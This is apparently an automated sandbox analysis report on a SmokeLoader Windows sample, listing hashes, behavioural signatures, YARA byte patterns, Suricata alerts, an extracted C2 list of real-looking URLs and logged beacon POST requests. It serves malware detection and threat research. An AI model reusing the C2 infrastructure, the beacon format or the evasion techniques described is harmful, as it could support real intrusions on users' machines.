Edit tour

Windows Analysis Report
1HGXcC63iu.exe

Overview

General Information

Sample name:	1HGXcC63iu.exe renamed because original name is a hash value
Original sample name:	8320df18fc9660f3a4dcaa29b3707847.exe
Analysis ID:	1532852
MD5:	8320df18fc9660f3a4dcaa29b3707847
SHA1:	1ec0afcceae9b6b0a771f28002b3617d45d5ab56
SHA256:	ce39271335727cb252102e59f53dedb8880fb3dca8f597bdf7e5d35c6d605de0
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to read the PEB

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

1HGXcC63iu.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\1HGXcC63iu.exe" MD5: 8320DF18FC9660F3A4DCAA29B3707847)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

scjabht (PID: 7684 cmdline: C:\Users\user\AppData\Roaming\scjabht MD5: 8320DF18FC9660F3A4DCAA29B3707847)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1776886814.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1776886814.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1777031529.0000000002DCD000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x33aa:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1776861891.0000000002D90000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000005.00000002.2043123976.0000000002D11000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2043123976.0000000002D11000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2042926455.0000000002B70000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000005.00000002.2043076647.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2043076647.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1777327835.00000000046C1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1777327835.00000000046C1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2043219102.0000000002D9D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3d02:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\scjabht, CommandLine: C:\Users\user\AppData\Roaming\scjabht, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\scjabht, NewProcessName: C:\Users\user\AppData\Roaming\scjabht, OriginalFileName: C:\Users\user\AppData\Roaming\scjabht, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\scjabht, ProcessId: 7684, ProcessName: scjabht

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T01:52:27.352704+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49736	189.161.95.103	80	TCP
2024-10-14T01:52:28.476787+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49737	189.161.95.103	80	TCP
2024-10-14T01:52:29.578063+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49738	189.161.95.103	80	TCP
2024-10-14T01:52:30.712318+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49739	189.161.95.103	80	TCP
2024-10-14T01:52:31.846797+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49740	189.161.95.103	80	TCP
2024-10-14T01:52:32.943368+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49741	189.161.95.103	80	TCP
2024-10-14T01:52:34.066205+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49742	189.161.95.103	80	TCP
2024-10-14T01:52:35.284563+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49743	189.161.95.103	80	TCP
2024-10-14T01:52:36.394921+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49744	189.161.95.103	80	TCP
2024-10-14T01:52:37.513650+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49745	189.161.95.103	80	TCP
2024-10-14T01:52:38.616273+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49746	189.161.95.103	80	TCP
2024-10-14T01:52:39.978543+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49747	189.161.95.103	80	TCP
2024-10-14T01:52:41.229308+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49748	189.161.95.103	80	TCP
2024-10-14T01:52:42.343624+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49749	189.161.95.103	80	TCP
2024-10-14T01:52:43.461849+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49750	189.161.95.103	80	TCP
2024-10-14T01:52:44.586287+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49751	189.161.95.103	80	TCP
2024-10-14T01:52:45.701213+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49752	189.161.95.103	80	TCP
2024-10-14T01:52:46.817207+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49753	189.161.95.103	80	TCP
2024-10-14T01:52:47.922152+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49754	189.161.95.103	80	TCP
2024-10-14T01:52:49.045985+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49755	189.161.95.103	80	TCP
2024-10-14T01:52:50.193029+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49756	189.161.95.103	80	TCP
2024-10-14T01:52:51.533325+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49757	189.161.95.103	80	TCP
2024-10-14T01:52:52.671964+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49758	189.161.95.103	80	TCP
2024-10-14T01:52:53.788983+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49759	189.161.95.103	80	TCP
2024-10-14T01:52:54.895988+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49760	189.161.95.103	80	TCP
2024-10-14T01:52:56.000150+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49761	189.161.95.103	80	TCP
2024-10-14T01:52:57.098914+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49762	189.161.95.103	80	TCP
2024-10-14T01:52:58.208548+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49763	189.161.95.103	80	TCP
2024-10-14T01:52:59.308215+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49766	189.161.95.103	80	TCP
2024-10-14T01:53:00.410405+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49772	189.161.95.103	80	TCP
2024-10-14T01:53:01.541617+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49783	189.161.95.103	80	TCP
2024-10-14T01:53:02.669552+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49789	189.161.95.103	80	TCP
2024-10-14T01:53:03.768388+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49797	189.161.95.103	80	TCP
2024-10-14T01:53:04.909931+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49806	189.161.95.103	80	TCP
2024-10-14T01:53:06.098599+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49812	189.161.95.103	80	TCP
2024-10-14T01:54:18.022227+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50037	58.151.148.90	80	TCP
2024-10-14T01:54:25.117522+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50038	58.151.148.90	80	TCP
2024-10-14T01:54:31.240510+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50039	58.151.148.90	80	TCP
2024-10-14T01:54:37.062971+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50040	58.151.148.90	80	TCP
2024-10-14T01:54:43.976866+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50041	58.151.148.90	80	TCP
2024-10-14T01:54:50.199292+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50042	58.151.148.90	80	TCP
2024-10-14T01:54:56.990013+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50043	58.151.148.90	80	TCP
2024-10-14T01:55:03.109844+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50044	58.151.148.90	80	TCP
2024-10-14T01:55:09.950050+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50045	58.151.148.90	80	TCP
2024-10-14T01:55:17.944120+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50046	58.151.148.90	80	TCP
2024-10-14T01:55:24.265967+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50047	58.151.148.90	80	TCP
2024-10-14T01:55:30.261756+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50048	58.151.148.90	80	TCP
2024-10-14T01:55:37.612387+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50049	58.151.148.90	80	TCP
2024-10-14T01:55:44.030057+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50050	58.151.148.90	80	TCP
2024-10-14T01:55:51.158024+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50051	58.151.148.90	80	TCP
2024-10-14T01:55:56.961550+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50052	58.151.148.90	80	TCP
2024-10-14T01:56:03.563735+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50053	58.151.148.90	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.1776886814.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\scjabht

ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: 1HGXcC63iu.exe

ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\scjabht

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 1HGXcC63iu.exe

Joe Sandbox ML: detected

Source: 1HGXcC63iu.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\1HGXcC63iu.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49757 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49762 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49759 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49761 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49783 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49812 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49806 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49772 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49766 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49797 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49760 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49789 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50043 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50037 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49763 -> 189.161.95.103:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50039 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50038 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50050 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50052 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50051 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50040 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50053 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50042 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50047 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50045 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50044 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50046 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50048 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50041 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50049 -> 58.151.148.90:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 58.151.148.90 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 189.161.95.103 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://nwgrus.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://tech-servers.in.net/tmp/index.php
Source: Malware configuration extractor	URLs: http://unicea.ws/tmp/index.php

Source: Joe Sandbox View

IP Address: 58.151.148.90 58.151.148.90

Source: Joe Sandbox View	ASN Name: POWERVIS-AS-KRLGPOWERCOMMKR POWERVIS-AS-KRLGPOWERCOMMKR
Source: Joe Sandbox View	ASN Name: UninetSAdeCVMX UninetSAdeCVMX

Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dylagwrgixlfmu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ibgfkpdryxjpgnqh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://eantthlyjjcdj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://shpbhnktrtag.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wcfffybtpterbqpa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xnobteannnesvysc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tapxxmacigntnnfe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vammwtwbjec.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://akhsodkspgrml.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tsjfluqkxyqldltv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xiohrwbimqciogt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://omlvjsbjwgbtt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vsbjnemdwavwq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lothfyrshwumy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://minslgtmvtn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ccnaltwqqqsxov.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://stlewbfilnqojsrv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://egmeddtwjwiedt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gklgbytfsyxm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: nwgrus.ru
